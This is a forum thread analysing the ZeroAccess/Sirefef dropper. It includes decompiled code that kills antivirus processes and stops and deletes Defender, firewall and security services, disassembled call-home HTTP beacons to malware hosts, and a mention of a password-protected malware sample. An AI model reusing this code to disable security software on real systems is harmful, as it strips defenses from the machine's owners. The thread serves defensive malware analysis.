A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #13963  by EP_X0FF
 Thu Jun 14, 2012 6:17 am
w32 & w64 are exactly the same code that presents in all infected services.exe posted here. Someone can try to infect machine with sample posted above. Running sample on x86 winxp - so far no services.exe modifications. One thing is now completely clear - all infections are strictly linked with Sirefef exactly not any other malware. And by the way, for kmd, I was right with dropper size :)
 #13964  by EP_X0FF
 Thu Jun 14, 2012 6:32 am
Attached decrypted dropper. See @00401FA0 for infection routine alongside with CAB extraction.

Services.exe is hardcoded
\systemroot\system32\services.exe
There are two code flows - one allows services.exe infection and one not. Both called from different places.
Check it at @00401670.

Routine that check presence of ZeroAccess rootkit edition @004010E2

Basically it is trying to open ZA rootkit device object \\??\\ACPI#PNP0303#2&da1a3ff&0, so it can skip already infected machines. If rootkit found, routine returns STATUS_VALIDATE_CONTINUE otherwise STATUS_OBJECT_NAME_NOT_FOUND (returned by Windows itself).
Attachments
pass: malware
(127.19 KiB) Downloaded 77 times
 #13966  by EP_X0FF
 Thu Jun 14, 2012 7:23 am
Also ZeroAccess loves MSE and Windows Defender. See @004026D5
It is doing this before services.exe infection.
Code: Select all
BOOLEAN CheckMSE(PUNICODE_STRING pav)
{
  return (BOOLEAN)RtlEqualUnicodeString(&WindowsDefenderSvc, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSE_MsasCUI, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSE_MpCmdRun, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSE_NisSrv, pav, 1)
      || (BOOLEAN)RtlEqualUnicodeString(&MSSE, pav, 1);
}
Code: Select all
Status = ZwOpenProcess(&hProcess, PROCESS_TERMINATE, &obja, entry->ClientId);
if ( NT_SUCCESS(Status) )
{
      ZwTerminateProcess(hProcess, 0);
      result = ZwClose(hProcess);
}
Code: Select all
hSCObject = OpenSCManagerW(0, 0, 0xF003Fu);
if ( hSCObject )
{
    hSvc = OpenServiceW(hSCObject, L"MsMpSvc", 0xF01FFu);
    if ( hSvc )
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"windefend", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"SharedAccess", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(v5);
    hSvc = OpenServiceW(hSCObject, L"iphlpsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"wscsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"mpssvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"bfe", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    CloseServiceHandle(hSCObject);
    KillMSE(pentry);
}
uncrypted.exe
:D
 #13969  by EP_X0FF
 Thu Jun 14, 2012 8:02 am
kmd wrote:@EP_X0FF

F-Secure blogged about ZeroAccess http://www.f-secure.com/weblog/archives/00002385.html
STATUS_VALIDATE_CONTINUE included
This has been known long time ago. F-Secure should google more. Prevx described dropper infection marker checking in its 2011 article.
http://pxnow.prevx.com/content/blog/zer ... alysis.pdf

and self deletion is nothing really interesting, they simple used NativeAPI/Context modification in combination with shellcode instead of usual CreateRemoteThread in Explorer etc.
 #13971  by kmd
 Thu Jun 14, 2012 8:17 am
.rdata:00422530 aGetCount_php?i db 'GET /count.php?id=%u&c=%u&d=7&s=%u HTTP/1.1',0Dh,0Ah
.rdata:00422530 ; DATA XREF: sub_402333+92o
.rdata:00422530 db 'Host: livecounter.co',0Dh,0Ah
.rdata:00422530 db 'User-Agent: Opera/9 (Windows NT %u.%u; %s; %s)',0Dh,0Ah
.rdata:00422530 db 'Connection: close',0Dh,0Ah
.rdata:00422530 db 0Dh,0Ah,0
.rdata:004225B9 align 10h
.rdata:004225C0 aGetGeoTxtCity_ db 'GET /geo/txt/city.php HTTP/1.0',0Dh,0Ah
.rdata:004225C0 ; DATA XREF: sub_402534+12o
.rdata:004225C0 db 'Host: promos.fling.com',0Dh,0Ah
.rdata:004225C0 db 'Connection: close',0Dh,0Ah
.rdata:004225C0 db 0Dh,0Ah,0
.rdata:0042260E align 10h
wtf?
 #13972  by EP_X0FF
 Thu Jun 14, 2012 8:22 am
Captain obvious told me: sh*t calls home and it want to know exact location of install, search WSASend somewhere in code which refers to these strings. It also reports was the system win64 or win32.
 #13975  by thisisu
 Thu Jun 14, 2012 3:30 pm
EP_X0FF wrote:
Code: Select all
hSCObject = OpenSCManagerW(0, 0, 0xF003Fu);
if ( hSCObject )
{
    hSvc = OpenServiceW(hSCObject, L"MsMpSvc", 0xF01FFu);
    if ( hSvc )
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"windefend", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"SharedAccess", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(v5);
    hSvc = OpenServiceW(hSCObject, L"iphlpsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"wscsvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"mpssvc", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    hSvc = OpenServiceW(hSCObject, L"bfe", 0xF01FFu);
    if ( hSvc)
      StopAndDeleteService(hSvc);
    CloseServiceHandle(hSCObject);
    KillMSE(pentry);
}
What does the 0xF01FFu in this code mean?

Edit: Some googling suggests: SERVICE_ALL_ACCESS = 0xf01ffu

So basically ZA tries to locate the above services, if it finds them, will grant full permissions over them and then stops and deletes them? :)
  • 1
  • 10
  • 11
  • 12
  • 13
  • 14
  • 56